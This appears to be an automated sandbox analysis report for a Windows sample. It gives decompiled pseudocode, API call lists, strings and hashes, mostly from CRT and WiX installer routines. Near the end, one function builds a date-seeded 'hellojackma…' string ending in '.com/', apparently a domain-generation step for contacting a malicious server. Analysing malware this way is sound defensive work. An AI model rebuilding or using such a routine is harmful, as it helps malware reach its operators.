                                                                                                                                                                  				E1000CF80(__edi, _v16, 0, _v8 + _t13);
                                                                                                                                                                  				MultiByteToWideChar(0, 0, _a4, _v12, _v16, _v8);
                                                                                                                                                                  				_v16[_v8] = 0;
                                                                                                                                                                  				return _v16;
                                                                                                                                                                  			}







                                                                                                                                                                  APIs
                                                                                                                                                                  • _strlen.LIBCMT ref: 1001A3E1
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3FC
                                                                                                                                                                  • _memset.LIBCMT ref: 1001A426
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A442
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$_memset_strlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 745779501-0
                                                                                                                                                                  • Opcode ID: 2e3c2576653a9b42fdd310f43433bf8f26c3ae11fa9d2da111245d4e24b55a0e
                                                                                                                                                                  • Instruction ID: 8dd7a9ca22c507c9c9ca29094530ba01303feab9f029a6df08f7648fa224dc70
                                                                                                                                                                  • Opcode Fuzzy Hash: 2e3c2576653a9b42fdd310f43433bf8f26c3ae11fa9d2da111245d4e24b55a0e
                                                                                                                                                                  • Instruction Fuzzy Hash: 1D11F1B9E00208BFEB14CFD4D895F9EB7B4EB48704F108198FA099B381D671AA058B91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00403B8E
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 00403BF5
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get value as numeric for variable: %ls, xrefs: 00403BE4
                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 00403BC8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                                  • API String ID: 3168844106-4270472870
                                                                                                                                                                  • Opcode ID: a1731366857e8d1aa50ff042858fb74ed9eea060ec1e3d07b5da242b6c4e0a1f
                                                                                                                                                                  • Instruction ID: 38b20f1d85783bf4ade0f111964c3c1ce6877057f52b45eb2760da9aaf40714e
                                                                                                                                                                  • Opcode Fuzzy Hash: a1731366857e8d1aa50ff042858fb74ed9eea060ec1e3d07b5da242b6c4e0a1f
                                                                                                                                                                  • Instruction Fuzzy Hash: CA019E36900225EBCF116F45CC05A8E3E39EB0432AF009176FD14BA291C73DEB10A7D8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00413D65,?,WixBundleOriginalSource,00401EA4,?,?,?,00000001,?,?,00000001,?), ref: 00403C0E
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,?,00413D65,?,WixBundleOriginalSource,00401EA4,?,?,?,00000001,?,?), ref: 00403C75
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get value as string for variable: %ls, xrefs: 00403C64
                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 00403C48
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                                  • API String ID: 3168844106-2100416246
                                                                                                                                                                  • Opcode ID: cb468e920ac39b43b4843556abf44f8660b03c287588f366473b6a9d6e057489
                                                                                                                                                                  • Instruction ID: 27765438aa07e2391a519ec962b624470b589de5c00cd989964ab4855677f583
                                                                                                                                                                  • Opcode Fuzzy Hash: cb468e920ac39b43b4843556abf44f8660b03c287588f366473b6a9d6e057489
                                                                                                                                                                  • Instruction Fuzzy Hash: C5014832905229EBDF116E55CC05A8E3E68AB00726F118136FD14BA290D37A9A209AD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00403CFD
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 00403D64
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 00403D37
                                                                                                                                                                  • Failed to get value as version for variable: %ls, xrefs: 00403D53
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                                  • API String ID: 3168844106-1851729331
                                                                                                                                                                  • Opcode ID: 66e1197d5652c4d6ffab44df83496ed1ebd8ddf3cb7fda4f6b22b659b7298504
                                                                                                                                                                  • Instruction ID: c0dd27b9d72ef7a5e96431f32014e41f453be5263beb087582655b90f6d459ca
                                                                                                                                                                  • Opcode Fuzzy Hash: 66e1197d5652c4d6ffab44df83496ed1ebd8ddf3cb7fda4f6b22b659b7298504
                                                                                                                                                                  • Instruction Fuzzy Hash: 47017132900229FBCF116F55DC05A8E3F69AF10366F114136FD14B6290D33D9F10A798
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 39%
                                                                                                                                                                  			E1000CA40(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                  				intOrPtr* _t10;
                                                                                                                                                                  				intOrPtr _t13;
                                                                                                                                                                  				intOrPtr _t23;
                                                                                                                                                                  				void* _t25;
                                                                                                                                                                  
                                                                                                                                                                  				_push(0xc);
                                                                                                                                                                  				_push(0x103314d0);
                                                                                                                                                                  				_t8 = E10010594(__ebx, __edi, __esi);
                                                                                                                                                                  				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                                                                  				if(_t23 == 0) {
                                                                                                                                                                  					L9:
                                                                                                                                                                  					return E100105D9(_t8);
                                                                                                                                                                  				}
                                                                                                                                                                  				if( *0x10337f3c != 3) {
                                                                                                                                                                  					_push(_t23);
                                                                                                                                                                  					L7:
                                                                                                                                                                  					_t8 = HeapFree( *0x10335310, 0, ??);
                                                                                                                                                                  					_t31 = _t8;
                                                                                                                                                                  					if(_t8 == 0) {
                                                                                                                                                                  						_t10 = E1000F780(_t31);
                                                                                                                                                                  						 *_t10 = E1000F745(GetLastError());
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L9;
                                                                                                                                                                  				}
                                                                                                                                                                  				L1000FA63(4);
                                                                                                                                                                  				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                                                                  				_t13 = E1000FADC(_t23);
                                                                                                                                                                  				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                                                                                  				if(_t13 != 0) {
                                                                                                                                                                  					_push(_t23);
                                                                                                                                                                  					_push(_t13);
                                                                                                                                                                  					E1000FB07();
                                                                                                                                                                  				}
                                                                                                                                                                  				 *(_t25 - 4) = 0xfffffffe;
                                                                                                                                                                  				_t8 = E1000CA96();
                                                                                                                                                                  				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                                                                                  					goto L9;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                                                                                  					goto L7;
                                                                                                                                                                  				}
                                                                                                                                                                  			}








                                                                                                                                                                  APIs
                                                                                                                                                                  • ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                  • ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2661975262-0
                                                                                                                                                                  • Opcode ID: d780af77af3ab278b6395a02338741367fa495b444a8d1c9c9272429d9e468c3
                                                                                                                                                                  • Instruction ID: 3e12d920bd94fb88c3074afbf6a3b3a9ea402cf26d7ac91cde5cb1516b55b14c
                                                                                                                                                                  • Opcode Fuzzy Hash: d780af77af3ab278b6395a02338741367fa495b444a8d1c9c9272429d9e468c3
                                                                                                                                                                  • Instruction Fuzzy Hash: 44016735A0531AAAFB10DBB18C86F5E3AA4EF023E9F210109F508AA0D5DF34A940DF56
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00405900,00000000,?,00000000,00000000,00000000,?,004057E5,00000000,?,00000000,00000000), ref: 00403C8E
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,?,00405900,00000000,?,00000000,00000000,00000000,?,004057E5,00000000,?), ref: 00403CE4
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to copy value of variable: %ls, xrefs: 00403CD3
                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 00403CB4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                                  • API String ID: 3168844106-2936390398
                                                                                                                                                                  • Opcode ID: 1099b003875badf870bf6f5c3e57efa93b26b465dc8326ce5f9587483286bc98
                                                                                                                                                                  • Instruction ID: 6c437455a87dcdaf22914444d8c26d3a08ed7d80b5df96ef5ff55de9c35bd096
                                                                                                                                                                  • Opcode Fuzzy Hash: 1099b003875badf870bf6f5c3e57efa93b26b465dc8326ce5f9587483286bc98
                                                                                                                                                                  • Instruction Fuzzy Hash: 9CF08133644229BBCF016F55CD05A8E3F29EF14356F108022FD14B6250D33ADB20AB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E1001F5D0() {
                                                                                                                                                                  				struct _FILETIME _v12;
                                                                                                                                                                  				struct _SYSTEMTIME _v28;
                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                                  				struct _SYSTEMTIME _v52;
                                                                                                                                                                  				struct _FILETIME _v60;
                                                                                                                                                                  				intOrPtr _t31;
                                                                                                                                                                  
                                                                                                                                                                  				_v28.wYear = 0x7b2;
                                                                                                                                                                  				_v28.wMonth = 1;
                                                                                                                                                                  				_v28.wDay = 1;
                                                                                                                                                                  				_v28.wHour = 0;
                                                                                                                                                                  				_v28.wMinute = 0;
                                                                                                                                                                  				_v28.wSecond = 0;
                                                                                                                                                                  				_v28.wMilliseconds = 0;
                                                                                                                                                                  				GetSystemTime( &_v52);
                                                                                                                                                                  				SystemTimeToFileTime( &_v52,  &_v12);
                                                                                                                                                                  				SystemTimeToFileTime( &_v28,  &_v60);
                                                                                                                                                                  				_t31 = _v12.dwLowDateTime - _v60.dwLowDateTime;
                                                                                                                                                                  				asm("sbb eax, [ebp-0x34]");
                                                                                                                                                                  				_v36 = E1000F2F0(_t31, _v12.dwHighDateTime, 0x2710, 0);
                                                                                                                                                                  				_v32 = _t31;
                                                                                                                                                                  				return _v36;
                                                                                                                                                                  			}










                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 1001F604
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 1001F612
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F620
                                                                                                                                                                  • __aulldiv.LIBCMT ref: 1001F63B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$System$File$__aulldiv
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3735792614-0
                                                                                                                                                                  • Opcode ID: 56842ad1edb196f60ab411e144c2dfedf5549195354fdd3cd1ae5dcdf75a643e
                                                                                                                                                                  • Instruction ID: af96395ebe124ed86fc63cf5983e6bcf699a861f8abc8f1b8a76f2a7ba2cf47c
                                                                                                                                                                  • Opcode Fuzzy Hash: 56842ad1edb196f60ab411e144c2dfedf5549195354fdd3cd1ae5dcdf75a643e
                                                                                                                                                                  • Instruction Fuzzy Hash: A501E575D1021DEADB00DFD4C8899EEB7B8FF04304F104649E904A7250EB79668ACB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000000), ref: 00436FA0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                                                                                  • API String ID: 3535843008-3023217399
                                                                                                                                                                  • Opcode ID: 42f7fef74cda6ca434e30f4ac7bfd20e302634303b5d7e14fb5bc54bd8e7e582
                                                                                                                                                                  • Instruction ID: 1324a6d1fc4aa40a439a40988d81ed16a0d6238c60a77588973d0548e78c38b6
                                                                                                                                                                  • Opcode Fuzzy Hash: 42f7fef74cda6ca434e30f4ac7bfd20e302634303b5d7e14fb5bc54bd8e7e582
                                                                                                                                                                  • Instruction Fuzzy Hash: F741A275E00216BBCF21DF84D985AAEB7B5EF48750F2290ABF500A7311D7389E41CB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0042AD46: __getptd_noexit.LIBCMT ref: 0042AD46
                                                                                                                                                                  • __getbuf.LIBCMT ref: 0042AE31
                                                                                                                                                                  • __lseeki64.LIBCMT ref: 0042AEA1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __getbuf__getptd_noexit__lseeki64
                                                                                                                                                                  • String ID: 8aE
                                                                                                                                                                  • API String ID: 3311320906-2942927555
                                                                                                                                                                  • Opcode ID: a8575fd3c179cdf712dd9253e00a6616f67038e1e2463d3a490177ee88c9604c
                                                                                                                                                                  • Instruction ID: 74c1c7918ac0a661b8519aced2efab69e4fdff155066f640028c8d63730da015
                                                                                                                                                                  • Opcode Fuzzy Hash: a8575fd3c179cdf712dd9253e00a6616f67038e1e2463d3a490177ee88c9604c
                                                                                                                                                                  • Instruction Fuzzy Hash: DE414471700B209FC3249F29E88167B77A5AB40330B55861FECAAC73C1D73C98128B1A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00438BD5: lstrlenW.KERNEL32(000000F8,?,?,?,00438F73,000000F8,000002A8,000002A8,000000F8,?,?,?,0041EA29,?,?,00000364), ref: 00438BFA
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004391DC
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000000), ref: 004391F6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$lstrlen
                                                                                                                                                                  • String ID: %ls\%ls
                                                                                                                                                                  • API String ID: 1752758355-2125769799
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 00436641
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004366A4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  • API String ID: 1948546556-2967768451
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • #171.MSI(00000000,?,0043B580,?), ref: 00434CF1
                                                                                                                                                                  • #171.MSI(00000000,?,?,?,?,?,00000000,?,0043B580,?), ref: 00434D31
                                                                                                                                                                    • Part of subcall function 0043497C: #115.MSI(?), ref: 004349AD
                                                                                                                                                                    • Part of subcall function 0043497C: #116.MSI(?,00000001,?), ref: 004349CB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: #171$#115#116
                                                                                                                                                                  • String ID: wiutil.cpp
                                                                                                                                                                  • API String ID: 2532461077-4248292292
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove_s
                                                                                                                                                                  • String ID: \\?\$\\?\UNC
                                                                                                                                                                  • API String ID: 800865076-2523517826
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,?,00000009,?,?,?,0040E53C,00000009,?,00000000,?,?,?,00401720), ref: 0040E04A
                                                                                                                                                                  Strings
                                                                                                                                                                  • Logging, xrefs: 0040DFDC
                                                                                                                                                                  • SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 0040DFBD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer
                                                                                                                                                                  • API String ID: 3535843008-387823766
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E10022BBB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                  				void* _t71;
                                                                                                                                                                  				void* _t78;
                                                                                                                                                                  
                                                                                                                                                                  				_t78 = __eflags;
                                                                                                                                                                  				_push( *(_t71 - 0x1e) & 0x0000ffff);
                                                                                                                                                                  				E1000CCA3(__edi, _t71 - 0x12c, "hellojackma%04d%02d5",  *(_t71 - 0x20) & 0x0000ffff);
                                                                                                                                                                  				 *((intOrPtr*)(_t71 - 0x10)) = E1001A4E0(__ebx,  *(_t71 - 0x20) & 0x0000ffff, __edi, __esi, _t78, _t71 - 0x12c);
                                                                                                                                                                  				 *((intOrPtr*)(_t71 - 0x2f4)) = E10001160(_t71 - 0x27c, _t78,  *((intOrPtr*)(_t71 - 0x10)));
                                                                                                                                                                  				 *((intOrPtr*)(_t71 - 0x2f8)) =  *((intOrPtr*)(_t71 - 0x2f4));
                                                                                                                                                                  				 *((char*)(_t71 - 4)) = 0xb;
                                                                                                                                                                  				E10001A90(_t71 - 0x148,  *((intOrPtr*)(_t71 - 0x2f8)));
                                                                                                                                                                  				 *((char*)(_t71 - 4)) = 0;
                                                                                                                                                                  				E100011A0(_t71 - 0x27c);
                                                                                                                                                                  				_push( *((intOrPtr*)(_t71 - 0x10)));
                                                                                                                                                                  				E1000CA40(__ebx, __edi, __esi, _t78);
                                                                                                                                                                  				 *((intOrPtr*)(_t71 - 0x2fc)) = E10001160(_t71 - 0x298, _t78, ".com/");
                                                                                                                                                                  				 *((intOrPtr*)(_t71 - 0x300)) =  *((intOrPtr*)(_t71 - 0x2fc));
                                                                                                                                                                  				 *((char*)(_t71 - 4)) = 0xc;
                                                                                                                                                                  				E10001A90(_t71 - 0x148,  *((intOrPtr*)(_t71 - 0x300)));
                                                                                                                                                                  				 *((char*)(_t71 - 4)) = 0;
                                                                                                                                                                  				E100011A0(_t71 - 0x298);
                                                                                                                                                                  				E10001110( *((intOrPtr*)(_t71 + 8)), _t78, _t71 - 0x148);
                                                                                                                                                                  				 *(_t71 - 0x29c) =  *(_t71 - 0x29c) | 0x00000001;
                                                                                                                                                                  				 *((intOrPtr*)(_t71 - 4)) = 0xffffffff;
                                                                                                                                                                  				E100011A0(_t71 - 0x148);
                                                                                                                                                                  				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
                                                                                                                                                                  				return  *((intOrPtr*)(_t71 + 8));
                                                                                                                                                                  			}






                                                                                                                                                                  APIs
                                                                                                                                                                  • _sprintf.LIBCMT ref: 10022BD1
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A51B
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A52E
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A53A
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A55D
                                                                                                                                                                    • Part of subcall function 1001A4E0: _sprintf.LIBCMT ref: 1001A5CC
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A616
